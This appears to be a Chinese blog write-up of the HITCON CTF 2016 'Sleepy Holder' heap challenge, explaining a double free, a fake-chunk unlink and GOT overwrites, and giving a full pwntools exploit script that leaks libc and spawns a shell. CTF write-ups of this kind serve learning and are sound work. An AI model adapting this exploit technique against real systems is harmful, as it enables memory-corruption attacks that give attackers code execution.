(unlink) HITCON CTF 2016 : Sleepy Holder

最新推荐文章于 2022-04-09 15:15:25 发布
最新推荐文章于 2022-04-09 15:15:25 发布
阅读量340 收藏 1
点赞数
分类专栏: pwn-heap pwn 文章标签: pwn 堆栈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36918532/article/details/122603388
版权

今天仍然是复习unlink的原理和利用过程

这个跟Secret Holder类似的,只不过huge secret一旦创建就无法删除了和修改了(我之前写payload时候忘记了,还delete(3)。。。)

安全检查之后拖到IDA里面:菜单题
在这里插入图片描述
free功能好像没什么毛病在这里插入图片描述
修改功能好像也没什么问题(难道问题在分配里面)
在这里插入图片描述
看到分配功能,也就是三个秘密分配,也没有什么分配函数读取越界溢出,或者off-by-null漏洞
然后大致只得到了,分配通过flag的位置是否为1,来判断的并且其相对的布局分别是
0x6020c0 =====>big secret ptr(大秘密堆地址) size 0xfa0(4000)
0x6020c8 =====>huge secret ptr(巨大秘密堆地址) size 0x61a80(400000)
0x6020d0 =====>small secret ptr(小秘密堆地址) size 0x28(40)
0x6020d8 =====>big secret flag(大秘密标志位)
0x6020dc =====>huge secret flag(巨型秘密标志位)
0x6020e0 =====>small secret ptr(小秘密标志位)

其实我一开始忘记了,堆的大小必须得是16的倍数(64位的)。。。然后我写payload创建堆的时候发现了大小是0x30,才想起来

也就是说必须得字节对齐,所以也就是后面的八个字节我们可以溢出修改大堆块的prev_size
so?那就可以伪造堆块进而触发unlink,随后就可以任意地址写了

这个是我一开始的慢慢调试的图片
在这里插入图片描述
首先是创建堆块,并且由于要达到释放堆块2时候触发unlink,所以进行以下操作
我就不截屏了

add(1,'b'*0x8)#small

add(2,'a'*8)#big

delete(1) 		#fastbin

add(3,'a'*8)#huge	move into smallbin

delete(1)	#	double free

然后触发unlink

payload = p64(0) + p64(0x21) #fake header
payload += p64(small_ptr-0x18)
payload += p64(small_ptr-0x10)
payload += p64(0x20) #prev_size
add(1,payload)
#now time ,free(2) ==> unlink,and need put addr into ptr
delete(2)

此时big secret处于释放状态,此时有两种修改意见,一在申请回来,二、修改flag(刚好能够修改的位置是big secret和huge flag的位置)

add(2,'a'*8)#big

payload = "A"*8 + p64(puts_got) + p64(0) + p64(free_got) + p32(1)+p32(1)
update(1,payload)

update(1,p64(puts_plt)) # free->puts

然后就已经把put_got写入到了ptr1的位置,free_got写入到了ptr0的位置
然后在修改small指向free->put
在这里插入图片描述
然后释放big chunk就相当于打印了put函数地址(delete(2))
然后同样的修改ptr0-free–>system,然后修改ptr1(big chunk)–>bin/sh就可以了

add(2,'a'*8)

update(1,p64(system_addr))

update(2,'/bin/sh\x00')

在这里插入图片描述
最后在释放big chunk就获得了shell
在这里插入图片描述
完整exp

from pwn import *


#context.log_level = 'debug'

p = process("./sleepyHolder_hitcon_2016")
#p = remote('node4.buuoj.cn',28739)
sleepyHolder = ELF("./sleepyHolder_hitcon_2016")
libc = ELF("libc.so.6")

def add(index, content):
    p.recvuntil("Renew secret\n")
    p.sendline("1")
    p.recvuntil("\n")
    p.sendline(str(index))
    p.recvuntil("secret: \n")
    p.send(content)

def delete(index):
    p.recvuntil("3. Renew secret\n")
    p.sendline("2")
    p.recvuntil("Big secret\n")
    p.send(str(index))

def update(index, content):
    p.recvuntil("Renew secret\n")
    p.sendline("3")
    p.recvuntil("Big secret\n")
    p.sendline(str(index))
    p.recvuntil("secret: \n")
    p.send(content)


small_ptr = 0x6020d0
big_ptr = 0x6020c0
huge_ptr = 0x6020c8

add(1,'b'*0x8)#small

add(2,'a'*8)#big

delete(1) 		#fastbin

add(3,'a'*8)#huge	move into smallbin

delete(1)	#	double free

payload = p64(0) + p64(0x21) #fake header
payload += p64(small_ptr-0x18)
payload += p64(small_ptr-0x10)
payload += p64(0x20) #prev_size
add(1,payload)
#now time ,free(2) ==> unlink,and need put addr into ptr
delete(2)

free_got = sleepyHolder.got['free']
puts_plt = sleepyHolder.plt['puts']
puts_got = sleepyHolder.got['puts']
print("free addr is : ",hex(free_got))		#free 0x602018
print("puts addr is : ",hex(puts_got))		#static puts 0x602020
print("puts_plt addr is : ",hex(puts_plt))	# 0x400760


add(2,'a'*8)#big
#gdb.attach(p)

payload = "A"*8 + p64(puts_got) + p64(0) + p64(free_got) + p32(1)+p32(1)
update(1,payload)

update(1,p64(puts_plt)) # free->puts
#gdb.attach(p)
#delete(3)
delete(2)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
print hex(puts_addr)


libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
print("system_addr",hex(system_addr))

#
add(2,'a'*8)

update(1,p64(system_addr))

update(2,'/bin/sh\x00')

delete(2)
#gdb.attach(p)







p.interactive()
是脆脆啊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Error: EPERM: operation not permitted, unlink
GengJL
10-11 2949
1、Error: EPERM: operation not permitted, unlink npm install 时遇到Error: EPERM: operation not permitted, unlink 问题 解决办法 : 执行npm install --no-optional后在npm install
使用npm install命令出现 errno -4048 25144 error Error: EPERM: operation not permitted, unlink 'C:
u013104328的博客
02-06 1751
npm install 报错解决方案 试过很多次,基本主要都是: 1、权限错误,提示你用管理员身份去运行,比如: 25142 error path C:\Users\wukeg\AppData\Roaming\npm\node_modules.staging\exif-parser-0bc3498c\test\starfish.jpg 25143 error errno -4048 25144 ...
sleepyHolder_hitcon_2016(fastbin的检查机制+malloc_consolidate+double free)
seaaseesa的博客
04-30 1038
sleepyHolder_hitcon_2016 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能没有清空指针,并且也没有校验,因此可以double free。 Edit功能又验证标志,因此不能UAF编辑 Add功能可以创建三种规格的堆。 由于没有开启PIE,并且堆指针存储在bss上,因此unlink是比较好的方法。但是不能溢出, 而要想成功d...
2016 HITCON CTF SleepyHolder
Bill
04-22 1735
2016 HITCON CTF SleepyHolder 序言 本来这周准备学习House_Of_Orange, 但是这个牵扯知识点太多. 忽然发现还有一个fastbin_dup_consolidate没有学习, 补一下. 程序运行(文章尾部有程序源码) 1. MENU 1. Keep secret 2. Wipe secret 3. Renew secret 2....
Hitcon 2016 SleepyHolder-fastbin_dup_consolidate
九层台
03-08 441
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/types.h> #define BASE 4...
sleepyHolder_hitcon_2016
z1r0的博客
04-09 368
sleepyHolder_hitcon_2016 查看保护 一个简单题目 这里没有清掉 攻击思路:利用fastbin_dup_consolidate这个手法实现double free。然后利用unlink攻击,改got为system发送sh即可getshell。 创建1和2类型的堆块,此时释放1,1会进fastbin。接下来申请3类型的堆,因为特别大所以1会进smallbin,此时再次释放1,就可以形成double free,申请回来1个1类型,会发现2的标志位还是0,所以可以使用unlink攻击来ge
unlink-sleepyholder
csdn546229768的博客
01-14 249
unlink(sleepyholder) 题目: hitconctf2016_sleepy_holder(就是进阶版的hitconctf2016_secret_holder) 函数分析: add update dele 总结 : 程序很简单,可以malloc三种类型的chunk,fast chunk \ large chunk \ large chunk(mmap()分配),明显的漏洞有uaf漏洞\double free漏洞,值的注意的是huge_chunk在被创建后就不能修改和删除了 往往简单的一
secretHolder_hitcon_2016(有关mmap的chunk如何分配到top chunk里与普通chunk相邻)
seaaseesa的博客
04-30 679
secretHolder_hitcon_2016 这题和上一题https://blog.csdn.net/seaaseesa/article/details/105856878功能相似,并且上一题的利用手法这里同样可以利用,这里,有另一种手法,从而引出了一个新的知识点。 这题,delete功能里增加了对huge chunk的free Huge chunk的大小为0x61A80,...
windowsland:HITCON CTF 2018
03-19
这是HITCON CTF 2018中挑战“ windowsland”的来源和文章 这个想法是利用Windows用户模式堆中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的...
给项目添加依赖:报错operation not permitted, unlink.原来是4048
01-20
syscall unlink npm ERR! path D:\Users\Megan\企业微信下载地址\WXWork\1688850487518406\Cache\File\2020-02\cmall-back1\node_modules\.staging\echarts-2100c70a\dist\echarts.js npm ERR! errno -4048 npm ERR...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
攻防世界PWNsecret_holder题解
seaaseesa的博客
02-07 1033
secret_holder 本题,附件在https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder,刷题网站上没有提供 拿到附件,我们先检查一下程序的保护机制 然后,我们用IDA分析一下 Free后没有清空指针,可以造成多次重复free 可以多次创建堆,只要我们free后再创建即可 那么,本题,我们可以利用...
2014 HITCON CTF stkof
Bill
03-16 2931
2014 HITCON CTF stkof 1.序言 接着how2heap的教程走,下面是unlink漏洞的利用及相关练习。 有关漏洞的原理,网上已经有很多说明了,在这里我给出一些比较靠谱一点的链接: CTF WiKi 堆溢出之unlink的利用-Yun Unlink Exploit Linux堆溢出漏洞利用之unlink 堆溢出的unlink利用方法 2.程序分析 ...
用交流和直流网络实现的西景电气中的飞机电力网simulink实现.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
井下甲烷气体报警器研发(工程教育课程项目报告)
09-10
井下甲烷气体报警器研发(工程教育课程项目报告)
2023-04-06-项目笔记 - 第二百五十二阶段 - 4.4.2.20全局变量的作用域-250 -2025.09.10
最新发布
09-10
2023-04-06-项目笔记-第二百五十二阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.250局变量的作用域_250- 2024-09-10
028.jpg
09-10
028
【2024首发原创】蜣螂算法DBO-TCN-LSTM-Multihead-Attention时间序列预测.zip
09-10
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化TCN-LSTM-Multihead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化TCN-LSTM-Multihead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化TCN-LSTM-Multihead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA优化TCN-LSTM-Multihead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化TCN-LSTM-Multihead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE优化TCN-LSTM-Multihead-Attention回归预测 4.4.6 其他优化算法优化TCN-LSTM-Multihead-Attention回归预测
Xshell报错unable to unlink old 'xxx: Permission denied
07-28
回答: 根据引用\[1\]中的内容,无法登录FTP的用户可以通过查看ftpusers文件来确定。该文件中列出了禁止登录的用户列表。如果尝试使用禁止登录的用户登录FTP,会出现权限被拒绝的错误。引用\[2\]中的例子是一个bash脚本,用于检查指定日志文件是否存在,并输出文件的行数。如果文件存在,则输出行数;如果文件不存在,则输出相应的提示信息。引用\[3\]中提到了创建共享目录并设置权限的步骤。首先需要确保RPC服务已启动,然后创建需要共享的目录并授权。接下来,修改目录的用户和组,以防止NFS客户端无法写入数据。最后,可以通过修改匿名用户的权限来确保共享目录的安全性。至于Xshell报错"unable to unlink old 'xxx: Permission denied",这个错误通常是由于没有足够的权限来删除指定的文件或目录导致的。 #### 引用[.reference_title] - *1* *2* *3* [Linux基于CentOS 7的学习笔记,喜欢的拿走。](https://blog.csdn.net/qq_43633589/article/details/123062049)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值